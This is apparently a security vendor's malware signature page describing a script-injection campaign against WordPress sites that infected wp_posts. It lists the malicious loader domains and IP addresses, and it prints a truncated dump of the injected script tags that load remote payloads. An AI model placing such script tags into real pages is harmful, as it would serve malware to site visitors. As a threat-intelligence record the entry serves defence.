Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:RKS:3

Description: Code used to insert a malicious javascript into many sites hosted at Rackspace and Mediatemple.

Loads malware from (all of them pointing to 91.188.59.203)
http://ae.awaue.com
http://ie.eracou.com
http://ao.euuaw.com
http://aeaaea.com/ou
http://secree.com/re
http://uoauer.com/si
http://oeooea.com/ve
http://secowo.com/wo
http://seconeo.com/on
http://ouroue.com/se
http://avoen.info/e

Newest versions of this attack are using 188.72.194.172:
http://w3.fairygoodideas.com/in.cgi?2

Infection: It infects all posts inside the database (wp_posts). Only wordpress sites are infected.

Clean up: Contact support@sucuri.net for help.

Malware dump:< script src = http://ao.euuaw.com/9 < script src = http://ae.awaue.com/7 < script src="http://aeaaea.com/o..

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb